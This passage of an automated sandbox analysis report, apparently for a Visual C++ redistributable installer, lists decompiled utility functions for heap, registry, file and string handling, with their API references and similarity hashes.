                                                                          				_t31 = E000138D4(_a8, _a12);
                                                                          				if(_t31 == 0) {
                                                                          					_t26 = 0x8007000e;
                                                                          					E000137D3(_t18, "memutil.cpp", 0x61, 0x8007000e);
                                                                          					goto L11;
                                                                          				}
                                                                          				_t29 = E00013B51(_a4);
                                                                          				if(_t29 != 0xffffffff) {
                                                                          					_t21 = E00013B51(_t31);
                                                                          					_t28 = _t21;
                                                                          					if(_t21 == 0xffffffff) {
                                                                          						goto L3;
                                                                          					}
                                                                          					_t22 =  >  ? _t29 : _t21;
                                                                          					E00031664(_t31, _t28, _a4,  >  ? _t29 : _t21);
                                                                          					_t24 = _a4;
                                                                          					if(_t29 == 0) {
                                                                          						L7:
                                                                          						E00013999(_a4);
                                                                          						goto L8;
                                                                          					} else {
                                                                          						goto L6;
                                                                          					}
                                                                          					do {
                                                                          						L6:
                                                                          						 *_t24 = 0;
                                                                          						_t24 = _t24 + 1;
                                                                          						_t29 = _t29 - 1;
                                                                          					} while (_t29 != 0);
                                                                          					goto L7;
                                                                          				}
                                                                          				L3:
                                                                          				_t26 = 0x80070057;
                                                                          				goto L9;
                                                                          			}












                                                                          APIs
                                                                          • GetProcessHeap.KERNEL32(00000010,00000000,80004005,00000000,00000000,00000100,?,00011472,00000000,80004005,00000000,80004005,00000000,000001C7,?,000113B7), ref: 00013AB2
                                                                          • HeapReAlloc.KERNEL32(00000000,?,00011472,00000000,80004005,00000000,80004005,00000000,000001C7,?,000113B7,000001C7,00000100,?,80004005,00000000), ref: 00013AB9
                                                                            • Part of subcall function 000138D4: GetProcessHeap.KERNEL32(?,000001C7,?,00012284,000001C7,00000001,80004005,8007139F,?,?,0005015F,8007139F,?,00000000,00000000,8007139F), ref: 000138E5
                                                                            • Part of subcall function 000138D4: RtlAllocateHeap.NTDLL(00000000,?,00012284,000001C7,00000001,80004005,8007139F,?,?,0005015F,8007139F,?,00000000,00000000,8007139F), ref: 000138EC
                                                                            • Part of subcall function 00013B51: GetProcessHeap.KERNEL32(00000000,000001C7,?,000121DC,000001C7,80004005,8007139F,?,?,0005015F,8007139F,?,00000000,00000000,8007139F), ref: 00013B59
                                                                            • Part of subcall function 00013B51: HeapSize.KERNEL32(00000000,?,000121DC,000001C7,80004005,8007139F,?,?,0005015F,8007139F,?,00000000,00000000,8007139F), ref: 00013B60
                                                                          • _memcpy_s.LIBCMT ref: 00013B04
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$Process$AllocAllocateSize_memcpy_s
                                                                          • String ID: memutil.cpp
                                                                          • API String ID: 3406509257-2429405624
                                                                          • Opcode ID: 0157f69c1c95994168259233d8b532aed498ebb919c0f98346b03de8da536867
                                                                          • Instruction ID: 0232028c134efbae55344b9de62df34f9871689bdde6152acb97115e8ef43d01
                                                                          • Opcode Fuzzy Hash: 0157f69c1c95994168259233d8b532aed498ebb919c0f98346b03de8da536867
                                                                          • Instruction Fuzzy Hash: 6E110331605618BFDF221B68DC85DEF3A99EF44764B004224FA155B192EB71CF909390
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 100%
                                                                          			E00023955(void* __ebx, void* __ecx, void* __edi, void* __esi, signed int* _a4) {
                                                                          				void* _v8;
                                                                          				void* _v12;
                                                                          				signed short* _t13;
                                                                          				signed int* _t21;
                                                                          				signed short* _t22;
                                                                          				void* _t24;
                                                                          				void* _t26;
                                                                          				void* _t27;
                                                                          				void* _t28;
                                                                          				signed int _t30;
                                                                          
                                                                          				_v8 = 0;
                                                                          				_v12 = 0;
                                                                          				if(E00050E3F(0x80000002, L"SOFTWARE\\Policies\\Microsoft\\Windows\\Installer", 0x20019,  &_v8) < 0 || E00050F6E(_v8, L"Logging",  &_v12) < 0) {
                                                                          					_t13 = _v12;
                                                                          				} else {
                                                                          					_t13 = _v12;
                                                                          					_t22 = _t13;
                                                                          					if( *_t13 != 0) {
                                                                          						_t21 = _a4;
                                                                          						do {
                                                                          							_t30 =  *_t22 & 0x0000ffff;
                                                                          							_t24 = 0x76;
                                                                          							if(_t24 == _t30) {
                                                                          								L9:
                                                                          								 *_t21 =  *_t21 | 0x00000002;
                                                                          							} else {
                                                                          								_t26 = 0x56;
                                                                          								if(_t26 == _t30) {
                                                                          									goto L9;
                                                                          								} else {
                                                                          									_t27 = 0x78;
                                                                          									if(_t27 == _t30) {
                                                                          										L8:
                                                                          										 *_t21 =  *_t21 | 0x00000004;
                                                                          									} else {
                                                                          										_t28 = 0x58;
                                                                          										if(_t28 == _t30) {
                                                                          											goto L8;
                                                                          										}
                                                                          									}
                                                                          								}
                                                                          							}
                                                                          							_t22 =  &(_t22[1]);
                                                                          						} while ( *_t22 != 0);
                                                                          					}
                                                                          				}
                                                                          				if(_t13 != 0) {
                                                                          					_t13 = E000554EF(_t13);
                                                                          				}
                                                                          				if(_v8 != 0) {
                                                                          					return RegCloseKey(_v8);
                                                                          				}
                                                                          				return _t13;
                                                                          			}














                                                                          APIs
                                                                            • Part of subcall function 00050E3F: RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,00000000,?,00055699,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000,00000000), ref: 00050E52
                                                                          • RegCloseKey.ADVAPI32(00000000,SOFTWARE\Policies\Microsoft\Windows\Installer,00020019,00000001,feclient.dll,?,?,?,00023E61,feclient.dll,?,00000000,?,?,?,00014A0C), ref: 000239F1
                                                                            • Part of subcall function 00050F6E: RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000002,00000001,00000000,00000000,00000000,00000000,00000000), ref: 00050FE4
                                                                            • Part of subcall function 00050F6E: RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,00000000,00000000,00000000,?), ref: 0005101F
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: QueryValue$CloseOpen
                                                                          • String ID: Logging$SOFTWARE\Policies\Microsoft\Windows\Installer$feclient.dll
                                                                          • API String ID: 1586453840-3596319545
                                                                          • Opcode ID: 83dabf228dc39b510fda47bbfac9b9c69650f7725749ccb4008fc5d90c364153
                                                                          • Instruction ID: 8bc8469d9a841bea35148cf836e82e0d119dae4a6911b2dcabd9f6873893e378
                                                                          • Opcode Fuzzy Hash: 83dabf228dc39b510fda47bbfac9b9c69650f7725749ccb4008fc5d90c364153
                                                                          • Instruction Fuzzy Hash: FC11E633B4021CBBDB219B94EC43AAFB7B8EB06B41F404067E5019B040D2B59FC0D750
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 100%
                                                                          			E0004E652(void* __eflags, signed int _a4) {
                                                                          				intOrPtr _t13;
                                                                          				void* _t21;
                                                                          				signed int _t33;
                                                                          				long _t35;
                                                                          
                                                                          				_t33 = _a4;
                                                                          				if(E00048D4E(_t33) != 0xffffffff) {
                                                                          					_t13 =  *0x7b158; // 0x12e75f8
                                                                          					if(_t33 != 1 || ( *(_t13 + 0x88) & 0x00000001) == 0) {
                                                                          						if(_t33 != 2 || ( *(_t13 + 0x58) & 0x00000001) == 0) {
                                                                          							goto L7;
                                                                          						} else {
                                                                          							goto L6;
                                                                          						}
                                                                          					} else {
                                                                          						L6:
                                                                          						_t21 = E00048D4E(2);
                                                                          						if(E00048D4E(1) == _t21) {
                                                                          							goto L1;
                                                                          						}
                                                                          						L7:
                                                                          						if(CloseHandle(E00048D4E(_t33)) != 0) {
                                                                          							goto L1;
                                                                          						}
                                                                          						_t35 = GetLastError();
                                                                          						L9:
                                                                          						E00048CBD(_t33);
                                                                          						 *((char*)( *((intOrPtr*)(0x7b158 + (_t33 >> 6) * 4)) + 0x28 + (_t33 & 0x0000003f) * 0x30)) = 0;
                                                                          						if(_t35 == 0) {
                                                                          							return 0;
                                                                          						}
                                                                          						return E00043E00(_t35) | 0xffffffff;
                                                                          					}
                                                                          				}
                                                                          				L1:
                                                                          				_t35 = 0;
                                                                          				goto L9;
                                                                          			}








                                                                          APIs
                                                                          • CloseHandle.KERNEL32(00000000,00000000,?,?,0004E570,?), ref: 0004E6A8
                                                                          • GetLastError.KERNEL32(?,0004E570,?), ref: 0004E6B2
                                                                          • __dosmaperr.LIBCMT ref: 0004E6DD
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: CloseErrorHandleLast__dosmaperr
                                                                          • String ID: @Met
                                                                          • API String ID: 2583163307-2381362037
                                                                          • Opcode ID: 0f52379c00474a61fee3c8946569b2553784f41e60d41cb19ae2c8b721904644
                                                                          • Instruction ID: 51f98298b923c67d57a713c19c1449823026ea667fb83b2bed8e44b83cb363b6
                                                                          • Opcode Fuzzy Hash: 0f52379c00474a61fee3c8946569b2553784f41e60d41cb19ae2c8b721904644
                                                                          • Instruction Fuzzy Hash: 53012F72E0129016D2641374DD45B7E67896BB1B74F260539F918DB1D2DF749C80429C
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 56%
                                                                          			E0003CF56(intOrPtr _a4, intOrPtr* _a8, intOrPtr* _a12, intOrPtr* _a16) {
                                                                          				intOrPtr* _t30;
                                                                          				intOrPtr* _t31;
                                                                          				intOrPtr _t32;
                                                                          				intOrPtr _t37;
                                                                          				intOrPtr _t38;
                                                                          
                                                                          				_t37 = _a4;
                                                                          				_t38 = 0;
                                                                          				WaitForSingleObject( *(_t37 + 0xc), 0xffffffff);
                                                                          				_t31 = _a8;
                                                                          				_t30 = _a12;
                                                                          				 *_t31 =  *((intOrPtr*)( *((intOrPtr*)(_t37 + 0x10)) + 0x424));
                                                                          				 *_t30 = 0;
                                                                          				 *_a16 = 0;
                                                                          				if( *_t31 != 0) {
                                                                          					_t32 = E000138D4( *((intOrPtr*)( *((intOrPtr*)(_t37 + 0x10)) + 0x42c)), 1);
                                                                          					 *_t30 = _t32;
                                                                          					if(_t32 != 0) {
                                                                          						E0003F0F0(_t32,  *((intOrPtr*)(_t37 + 0x10)) + 0x430,  *((intOrPtr*)( *((intOrPtr*)(_t37 + 0x10)) + 0x42c)));
                                                                          						 *_a16 =  *((intOrPtr*)( *((intOrPtr*)(_t37 + 0x10)) + 0x42c));
                                                                          					} else {
                                                                          						_t38 = 0x8007000e;
                                                                          						E000137D3(_t23, "NetFxChainer.cpp", 0x9b, 0x8007000e);
                                                                          						_push("Failed to allocate memory for message data");
                                                                          						_push(0x8007000e);
                                                                          						E0005012F();
                                                                          					}
                                                                          				}
                                                                          				ReleaseMutex( *(_t37 + 0xc));
                                                                          				return _t38;
                                                                          			}









                                                                          APIs
                                                                          • WaitForSingleObject.KERNEL32(?,000000FF,00000002,00000000,?,?,0003D1DC,00000000,00000000,00000000,?), ref: 0003CF66
                                                                          • ReleaseMutex.KERNEL32(?,?,0003D1DC,00000000,00000000,00000000,?), ref: 0003CFED
                                                                            • Part of subcall function 000138D4: GetProcessHeap.KERNEL32(?,000001C7,?,00012284,000001C7,00000001,80004005,8007139F,?,?,0005015F,8007139F,?,00000000,00000000,8007139F), ref: 000138E5
                                                                            • Part of subcall function 000138D4: RtlAllocateHeap.NTDLL(00000000,?,00012284,000001C7,00000001,80004005,8007139F,?,?,0005015F,8007139F,?,00000000,00000000,8007139F), ref: 000138EC
                                                                          Strings
                                                                          • Failed to allocate memory for message data, xrefs: 0003CFB5
                                                                          • NetFxChainer.cpp, xrefs: 0003CFAB
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$AllocateMutexObjectProcessReleaseSingleWait
                                                                          • String ID: Failed to allocate memory for message data$NetFxChainer.cpp
                                                                          • API String ID: 2993511968-1624333943
                                                                          • Opcode ID: 459dc7b8aeb425fbd8d1f1b8c32c9528cd5571502e07334f90b2a74f93710f56
                                                                          • Instruction ID: 9c6e25f4f16680fccf93964940fb8fe79ede3f5d736d24a520e5044ee006c8d4
                                                                          • Opcode Fuzzy Hash: 459dc7b8aeb425fbd8d1f1b8c32c9528cd5571502e07334f90b2a74f93710f56
                                                                          • Instruction Fuzzy Hash: 8C1182B1300315AFD715DF28D855E9ABBA9FF09720F104275F9159B3A2C771AC10CBA4
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 100%
                                                                          			E0001155F(short** _a4, intOrPtr _a8, int _a12, int _a16) {
                                                                          				short** _t15;
                                                                          				int _t16;
                                                                          				void* _t17;
                                                                          
                                                                          				_t15 = _a4;
                                                                          				_t16 = _a12;
                                                                          				_t17 = E000121A5(_t15, _a8, _t16);
                                                                          				if(_t17 < 0) {
                                                                          					L6:
                                                                          					return _t17;
                                                                          				}
                                                                          				if(_t16 != 0) {
                                                                          					L4:
                                                                          					if(LCMapStringW(0x7f, _a16,  *_t15, _t16,  *_t15, _t16) == 0) {
                                                                          						_t20 =  <=  ? GetLastError() : _t10 & 0x0000ffff | 0x80070000;
                                                                          						_t17 =  >=  ? 0x80004005 :  <=  ? GetLastError() : _t10 & 0x0000ffff | 0x80070000;
                                                                          						E000137D3(0x80004005, "strutil.cpp", 0xa51, _t17);
                                                                          					}
                                                                          					goto L6;
                                                                          				}
                                                                          				_t17 = E00011C57( *_t15, 0x7fffffff,  &_a12);
                                                                          				if(_t17 < 0) {
                                                                          					goto L6;
                                                                          				}
                                                                          				_t16 = _a12;
                                                                          				goto L4;
                                                                          			}







                                                                          APIs
                                                                          • LCMapStringW.KERNEL32(0000007F,00000000,00000000,00026EF3,00000000,00026EF3,00000000,00000000,00026EF3,00000000,00000000,00000000,?,00012326,00000000,00000000), ref: 000115A3
                                                                          • GetLastError.KERNEL32(?,00012326,00000000,00000000,00026EF3,00000200,?,0005516B,00000000,00026EF3,00000000,00026EF3,00000000,00000000,00000000), ref: 000115AD
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLastString
                                                                          • String ID: @Met$strutil.cpp
                                                                          • API String ID: 3728238275-569070560
                                                                          • Opcode ID: acd7d3e01c50b15489490da1d7f4067d2c2e0b9db361f864ef015ce932a200c4
                                                                          • Instruction ID: d8756cb5e103be087d359e82ecf7ea9a5dc384a076cc0222632d88826e26eca9
                                                                          • Opcode Fuzzy Hash: acd7d3e01c50b15489490da1d7f4067d2c2e0b9db361f864ef015ce932a200c4
                                                                          • Instruction Fuzzy Hash: AA01B533600B29B7DB219E969C44ED77AAAEF85760B010115FF159B151D721DC5087E1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 86%
                                                                          			E0004D244(void* __ecx, void* __eflags, signed int _a4, union _LARGE_INTEGER _a8, union _LARGE_INTEGER* _a12, intOrPtr _a16) {
                                                                          				signed int _v8;
                                                                          				void* _v12;
                                                                          				void* _t15;
                                                                          				signed int _t19;
                                                                          				signed int _t32;
                                                                          				signed int _t33;
                                                                          				signed int _t36;
                                                                          
                                                                          				_t36 = _a4;
                                                                          				_push(_t32);
                                                                          				_t15 = E00048D4E(_t36);
                                                                          				_t33 = _t32 | 0xffffffff;
                                                                          				if(_t15 != _t33) {
                                                                          					_push(_a16);
                                                                          					if(SetFilePointerEx(_t15, _a8, _a12,  &_v12) != 0) {
                                                                          						if((_v12 & _v8) == _t33) {
                                                                          							goto L2;
                                                                          						} else {
                                                                          							_t19 = _v12;
                                                                          							_t39 = (_t36 & 0x0000003f) * 0x30;
                                                                          							 *( *((intOrPtr*)(0x7b158 + (_t36 >> 6) * 4)) + _t39 + 0x28) =  *( *((intOrPtr*)(0x7b158 + (_t36 >> 6) * 4)) + 0x28 + (_t36 & 0x0000003f) * 0x30) & 0x000000fd;
                                                                          						}
                                                                          					} else {
                                                                          						E00043E00(GetLastError());
                                                                          						goto L2;
                                                                          					}
                                                                          				} else {
                                                                          					 *((intOrPtr*)(E00043E36())) = 9;
                                                                          					L2:
                                                                          					_t19 = _t33;
                                                                          				}
                                                                          				return _t19;
                                                                          			}











                                                                          APIs
                                                                          • SetFilePointerEx.KERNEL32(00000000,00000000,00000002,?,00000000,?,00000000,?,?,?,0004D2D8,?,00000000,00000002,00000000), ref: 0004D27D
                                                                          • GetLastError.KERNEL32(?,0004D2D8,?,00000000,00000002,00000000,?,0004D0F0,00000000,00000000,00000000,00000002,00000000,?,00000000), ref: 0004D287
                                                                          • __dosmaperr.LIBCMT ref: 0004D28E
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorFileLastPointer__dosmaperr
                                                                          • String ID: @Met
                                                                          • API String ID: 2336955059-2381362037
                                                                          • Opcode ID: 6cd8df9da9805c7a0320933d962dfe6bc71e705e98a8a252b1c44a943d9bcdfe
                                                                          • Instruction ID: 0066ea021a80cb4497b28ea17766c020af072db1fe9118c8e01c6df671e118c6
                                                                          • Opcode Fuzzy Hash: 6cd8df9da9805c7a0320933d962dfe6bc71e705e98a8a252b1c44a943d9bcdfe
                                                                          • Instruction Fuzzy Hash: 3A014C72B14214AFCB159FE9DC058AF3B69EB85330B24025AF8119B1D1EAB0ED418794
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          Strings
                                                                          • userForApplication.cpp, xrefs: 0002FC84
                                                                          • Failed to allocate new BootstrapperuserForApplication object., xrefs: 0002FC8E
                                                                          • Failed to QI for IBootstrapperuser from BootstrapperuserForApplication object., xrefs: 0002FCB0
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: userForApplication.cpp$Failed to QI for IBootstrapperuser from BootstrapperuserForApplication object.$Failed to allocate new BootstrapperuserForApplication object.
                                                                          • API String ID: 0-1509993410
                                                                          • Opcode ID: 8e1b0356c8f9eb303bfef35ed73ae8316b290ae82db0bfef20cb8e7697f898b6
                                                                          • Instruction ID: 3a35fb3fcac91b33945d1aa076ee0afe4e06ead966725b4c3ac6111a14a96d2d
                                                                          • Opcode Fuzzy Hash: 8e1b0356c8f9eb303bfef35ed73ae8316b290ae82db0bfef20cb8e7697f898b6
                                                                          • Instruction Fuzzy Hash: 83F026362446277B87122615EC02DAF776DCF417A07200036FD05AA291EA6089408565
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 100%
                                                                          			E000133D7(WCHAR** _a4, struct HINSTANCE__* _a8) {
                                                                          				long _t6;
                                                                          				WCHAR** _t10;
                                                                          				long _t11;
                                                                          				void* _t12;
                                                                          
                                                                          				_t10 = _a4;
                                                                          				_t11 = 0x104;
                                                                          				while(1) {
                                                                          					_t12 = E00011EDE(_t10, _t11);
                                                                          					if(_t12 < 0) {
                                                                          						break;
                                                                          					}
                                                                          					_t6 = GetModuleFileNameW(_a8,  *_t10, _t11);
                                                                          					if(_t6 == 0) {
                                                                          						_t15 =  <=  ? GetLastError() : _t7 & 0x0000ffff | 0x80070000;
                                                                          						_t12 =  >=  ? 0x80004005 :  <=  ? GetLastError() : _t7 & 0x0000ffff | 0x80070000;
                                                                          						E000137D3(0x80004005, "pathutil.cpp", 0x1d4, _t12);
                                                                          					} else {
                                                                          						if(_t6 != _t11) {
                                                                          							_t12 = 0;
                                                                          						} else {
                                                                          							_t3 = _t6 + 1; // 0x1
                                                                          							_t11 = _t3;
                                                                          							continue;
                                                                          						}
                                                                          					}
                                                                          					break;
                                                                          				}
                                                                          				return _t12;
                                                                          			}








                                                                          APIs
                                                                          • GetModuleFileNameW.KERNEL32(?,?,00000104,?,00000104,?,?,?,?,000110DD,?,00000000), ref: 000133F8
                                                                          • GetLastError.KERNEL32(?,?,?,000110DD,?,00000000), ref: 0001340F
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorFileLastModuleName
                                                                          • String ID: @Met$pathutil.cpp
                                                                          • API String ID: 2776309574-364970561
                                                                          • Opcode ID: 733bbe6f7e4da303e3cd70438090620b4b52fe5bbad54442c2cdbab72ef53952
                                                                          • Instruction ID: b0e38abfdba81d2dcbb29f410455784513bb81bb860b2b283d36003b1300a440
                                                                          • Opcode Fuzzy Hash: 733bbe6f7e4da303e3cd70438090620b4b52fe5bbad54442c2cdbab72ef53952
                                                                          • Instruction Fuzzy Hash: 74F0F633B047306BE7325AAA5C48ED7BADDEF45760B024121FE05EB150D721ED4082F0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 68%
                                                                          			E000548CB(void* __ecx, intOrPtr _a4, intOrPtr* _a8) {
                                                                          				intOrPtr _v8;
                                                                          				char _v12;
                                                                          				char* _t8;
                                                                          				void* _t16;
                                                                          				intOrPtr* _t17;
                                                                          				void* _t19;
                                                                          				intOrPtr _t20;
                                                                          
                                                                          				_t17 = _a8;
                                                                          				_t8 =  &_v12;
                                                                          				_t20 = 0;
                                                                          				 *_t17 = 0;
                                                                          				 *((intOrPtr*)(_t17 + 4)) = 0;
                                                                          				__imp__GetFileSizeEx(_a4, _t8, _t16, _t19, __ecx, __ecx);
                                                                          				if(_t8 != 0) {
                                                                          					 *_t17 = _v12;
                                                                          					 *((intOrPtr*)(_t17 + 4)) = _v8;
                                                                          				} else {
                                                                          					_t24 =  <=  ? GetLastError() : _t10 & 0x0000ffff | 0x80070000;
                                                                          					_t20 =  >=  ? 0x80004005 :  <=  ? GetLastError() : _t10 & 0x0000ffff | 0x80070000;
                                                                          					E000137D3(0x80004005, "fileutil.cpp", 0x246, _t20);
                                                                          				}
                                                                          				return _t20;
                                                                          			}











                                                                          APIs
                                                                          • GetFileSizeEx.KERNEL32(00000000,00000000,00000000,746AFB40,?,?,?,0001B919,?,?,?,00000000,00000000), ref: 000548E3
                                                                          • GetLastError.KERNEL32(?,?,?,0001B919,?,?,?,00000000,00000000,?,?,?,00000000,77D89EB0,00000000), ref: 000548ED
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorFileLastSize
                                                                          • String ID: @Met$fileutil.cpp
                                                                          • API String ID: 464720113-2299628883
                                                                          • Opcode ID: 1cc48bba3697da5d29c2256fb209dbed44d692fb329cde763b2c13dcdd319c25
                                                                          • Instruction ID: a05bc5d3c05885bc47a92a33fcec526b8c0681e1cc94477ee08819c82208b7fc
                                                                          • Opcode Fuzzy Hash: 1cc48bba3697da5d29c2256fb209dbed44d692fb329cde763b2c13dcdd319c25
                                                                          • Instruction Fuzzy Hash: 1EF0AFB2A04326ABA7109F9988059ABFBECEF04751B01421AFC09E7240D371AD10CBE0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 75%
                                                                          			E00046A76(void* __edx, signed int* _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, signed int _a28, intOrPtr _a32, intOrPtr _a36) {
                                                                          				signed int _v8;
                                                                          				signed int _v12;
                                                                          				signed int _v16;
                                                                          				unsigned int _v20;
                                                                          				signed int _v28;
                                                                          				signed int _v32;
                                                                          				signed int _v36;
                                                                          				char _v40;
                                                                          				intOrPtr _v48;
                                                                          				char _v52;
                                                                          				void* __ebx;
                                                                          				void* __edi;
                                                                          				void* _t86;
                                                                          				signed int _t92;
                                                                          				signed int _t93;
                                                                          				signed int _t94;
                                                                          				signed int _t100;
                                                                          				void* _t101;
                                                                          				void* _t102;
                                                                          				void* _t104;
                                                                          				void* _t107;
                                                                          				void* _t109;
                                                                          				void* _t111;
                                                                          				void* _t115;
                                                                          				char* _t116;
                                                                          				void* _t119;
                                                                          				signed int _t121;
                                                                          				signed int _t128;
                                                                          				signed int* _t129;
                                                                          				signed int _t136;
                                                                          				signed int _t137;
                                                                          				char _t138;
                                                                          				signed int _t139;
                                                                          				signed int _t142;
                                                                          				signed int _t146;
                                                                          				signed int _t151;
                                                                          				char _t156;
                                                                          				char _t157;
                                                                          				void* _t161;
                                                                          				unsigned int _t162;
                                                                          				signed int _t164;
                                                                          				signed int _t166;
                                                                          				signed int _t170;
